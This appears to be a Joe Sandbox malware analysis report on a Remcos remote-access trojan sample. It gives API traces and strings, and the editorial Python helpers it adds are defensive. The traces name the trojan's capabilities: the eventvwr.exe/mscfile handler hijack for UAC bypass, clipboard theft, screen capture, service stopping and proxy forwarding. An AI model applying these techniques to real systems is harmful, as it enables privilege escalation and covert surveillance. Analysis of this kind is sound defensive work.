                                  • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                  • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
                                • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                                  • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F
                                Strings
                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                • String ID: 05Mw`Mw$H"G$H"G
                                • API String ID: 3795512280-1384184782
                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 0040549F
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                                • TranslateMessage.USER32(?), ref: 0040555E
                                • DispatchMessageA.USER32(?), ref: 00405569
                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                Strings
                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                • String ID: CloseChat$DisplayMessage$GetMessage
                                • API String ID: 2956720200-749203953
                                APIs
                                  • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                                • CloseHandle.KERNEL32(00000000), ref: 00416123
                                • DeleteFileA.KERNEL32(00000000), ref: 00416132
                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                Strings
                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                • String ID: <$@$@%G$@%G$Temp
                                • API String ID: 1704390241-4139030828
                                • Opcode ID: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                                • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                                • Opcode Fuzzy Hash: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                                • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                                • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                                • Opcode Fuzzy Hash: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                                • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                                APIs
                                • _free.LIBCMT ref: 00445645
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 00445651
                                • _free.LIBCMT ref: 0044565C
                                • _free.LIBCMT ref: 00445667
                                • _free.LIBCMT ref: 00445672
                                • _free.LIBCMT ref: 0044567D
                                • _free.LIBCMT ref: 00445688
                                • _free.LIBCMT ref: 00445693
                                • _free.LIBCMT ref: 0044569E
                                • _free.LIBCMT ref: 004456AC
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                                • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                                APIs
                                • __EH_prolog.LIBCMT ref: 00417F6F
                                • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
                                • Sleep.KERNEL32(000003E8), ref: 004180B3
                                • GetLocalTime.KERNEL32(?), ref: 004180BB
                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                • API String ID: 489098229-3790400642
                                • Opcode ID: 27953ccb73c7935c50ce76e498ac53549bd0f641fbc99231dbf637836dbf8ac1
                                • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
                                • Opcode Fuzzy Hash: 27953ccb73c7935c50ce76e498ac53549bd0f641fbc99231dbf637836dbf8ac1
                                • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
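The function above builds its capture names from the format strings time_%04i%02i%02i_%02i%02i%02i and wnd_%04i%02i%02i_%02i%02i%02i filled from GetLocalTime, after GdiplusStartup and CreateDirectoryW. The Python helper below is an added example, not part of the Joe Sandbox report or of the sample; it turns a directory listing of such names back into a capture timeline so an analyst can see how often captures were taken. The report does not show a file extension, so the helper accepts any extension or none, and it rejects names whose digits do not form a valid time. The listing it runs on is constructed for the example.

```python
"""Recover a capture timeline from Remcos-style screenshot file names."""
import re
from collections import defaultdict
from datetime import datetime

# prefix _ YYYYMMDD _ HHMMSS, optional extension (the report does not show one)
NAME_RE = re.compile(r"^(time|wnd)_(\d{4})(\d{2})(\d{2})_(\d{2})(\d{2})(\d{2})(?:\.\w+)?$")


def parse_capture_name(name):
    """Return (prefix, datetime) for a matching name, or None for anything else,
    including names whose digits fit the pattern but are not a valid local time."""
    m = NAME_RE.match(name)
    if not m:
        return None
    prefix, *parts = m.groups()
    try:
        return prefix, datetime(*map(int, parts))
    except ValueError:  # e.g. month 13 or hour 25
        return None


def capture_timeline(names):
    """Group matching names by prefix and sort each group's timestamps."""
    groups = defaultdict(list)
    for n in names:
        parsed = parse_capture_name(n)
        if parsed:
            groups[parsed[0]].append(parsed[1])
    return {k: sorted(v) for k, v in groups.items()}


def capture_intervals(stamps):
    """Seconds between consecutive captures; a constant value points to timed capture."""
    return [int((b - a).total_seconds()) for a, b in zip(stamps, stamps[1:])]


# Constructed listing: three "time_" names one minute apart, one "wnd_" name,
# one name with an impossible hour, and one unrelated file. The .jpg extension
# is assumed for the example only.
SAMPLE_LISTING = [
    "time_20241120_101500.jpg", "time_20241120_101600.jpg", "time_20241120_101700.jpg",
    "wnd_20241120_101530", "time_20241120_256000.jpg", "desktop.ini",
]

if __name__ == "__main__":
    for prefix, stamps in capture_timeline(SAMPLE_LISTING).items():
        print(prefix, [s.isoformat() for s in stamps], capture_intervals(stamps))
```

Point capture_timeline at os.listdir() of a suspect directory; the intervals of the "time_" group show whether captures were taken on a fixed schedule, which is useful when scoping how long the host was observed.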
                                APIs
                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: DecodePointer
                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                • API String ID: 3527080286-3064271455
                                • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
                                • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                                  • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                • Sleep.KERNEL32(00000064), ref: 00415A46
                                • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CreateDeleteExecuteShellSleep
                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                • API String ID: 1462127192-2001430897
                                • Opcode ID: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                                • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                                • Opcode Fuzzy Hash: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                                • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                                • ExitProcess.KERNEL32 ref: 00406782
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteExitProcessShell
                                • String ID: H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                • API String ID: 1124553745-1488154373
                                • Opcode ID: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                                • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                                • Opcode Fuzzy Hash: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                                • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                                APIs
                                • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                                • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocConsoleShowWindow
                                • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                • API String ID: 4118500197-4025029772
                                • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                                • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                                  • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                                  • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                  • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                                • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                                • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                                • TranslateMessage.USER32(?), ref: 0041B29E
                                • DispatchMessageA.USER32(?), ref: 0041B2A8
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                • String ID: Remcos
                                • API String ID: 1970332568-165870891
                                • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
                                • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                                • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
                                • Opcode Fuzzy Hash: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                                • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
                                APIs
                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045100F
                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451092
                                • __alloca_probe_16.LIBCMT ref: 004510CA
                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0045123C,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451125
                                • __alloca_probe_16.LIBCMT ref: 00451174
                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045113C
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 004511B8
                                • __freea.LIBCMT ref: 004511E3
                                • __freea.LIBCMT ref: 004511EF
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                • String ID:
                                • API String ID: 201697637-0
                                • Opcode ID: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
                                • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
                                • Opcode Fuzzy Hash: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
                                • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • _memcmp.LIBVCRUNTIME ref: 00442935
                                • _free.LIBCMT ref: 004429A6
                                • _free.LIBCMT ref: 004429BF
                                • _free.LIBCMT ref: 004429F1
                                • _free.LIBCMT ref: 004429FA
                                • _free.LIBCMT ref: 00442A06
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorLast$_abort_memcmp
                                • String ID: C
                                • API String ID: 1679612858-1037565863
                                • Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                                • Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: tcp$udp
                                • API String ID: 0-3725065008
                                • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                                • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Eventinet_ntoa
                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                • API String ID: 3578746661-168337528
                                • Opcode ID: 91f6b250a27052f763f33f931300f679483c58cf17455d7b6bb400d635c1d2e1
                                • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
                                • Opcode Fuzzy Hash: 91f6b250a27052f763f33f931300f679483c58cf17455d7b6bb400d635c1d2e1
                                • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
                                APIs
                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                                  • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,00404C29,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404B85
                                  • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                • String ID: .part
                                • API String ID: 1303771098-3499674018
                                • Opcode ID: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                                • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                                • Opcode Fuzzy Hash: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                                • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043E2F6,0043E2F6,?,?,?,00447215,00000001,00000001,80E85006), ref: 0044701E
                                • __alloca_probe_16.LIBCMT ref: 00447056
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00447215,00000001,00000001,80E85006,?,?,?), ref: 004470A4
                                • __alloca_probe_16.LIBCMT ref: 0044713B
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,80E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
                                • __freea.LIBCMT ref: 004471AB
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                • __freea.LIBCMT ref: 004471B4
                                • __freea.LIBCMT ref: 004471D9
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                • String ID:
                                • API String ID: 3864826663-0
                                • Opcode ID: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                                • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
                                • Opcode Fuzzy Hash: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                                • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
                                APIs
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                                • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: InputSend
                                • String ID:
                                • API String ID: 3431551938-0
                                • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                                • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                                APIs
                                • OpenClipboard.USER32 ref: 00414F41
                                • EmptyClipboard.USER32 ref: 00414F4F
                                • CloseClipboard.USER32 ref: 00414F55
                                • OpenClipboard.USER32 ref: 00414F5C
                                • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                • CloseClipboard.USER32 ref: 00414F84
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                • String ID:
                                • API String ID: 2172192267-0
                                • Opcode ID: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                                • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
                                • Opcode Fuzzy Hash: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                                • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
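Several of the function blocks above expose a capability purely through their API trace and string constants: the service-control routine (OpenSCManagerW, OpenServiceW, then ControlService with 00000001 as its second argument), the dxdiag routine (ShellExecuteW open dxdiag alongside the strings /t and \sysinfo.txt, followed by DeleteFileW), the routine carrying Software\Classes\mscfile\shell\open\command and eventvwr.exe next to ShellExecuteW, and the clipboard routine (OpenClipboard, GetClipboardData, with send in a subcall). The Python below is an added example, not Joe Sandbox or Remcos code; it parses function blocks in the text form shown on this page and applies four rules derived from exactly those traces. Its sample input is copied from the blocks above. The rule labels are the editor's reading of the calls, and the service-stop rule assumes the sandbox prints the observed stack arguments in call order, so the second ControlService argument is dwControl (1 = SERVICE_CONTROL_STOP). The mscfile key plus eventvwr.exe combination is the well-known handler hijack that abuses Event Viewer's auto-elevation.

```python
"""Classify Joe Sandbox function blocks by the capabilities their API traces show."""
import re
from dataclasses import dataclass, field

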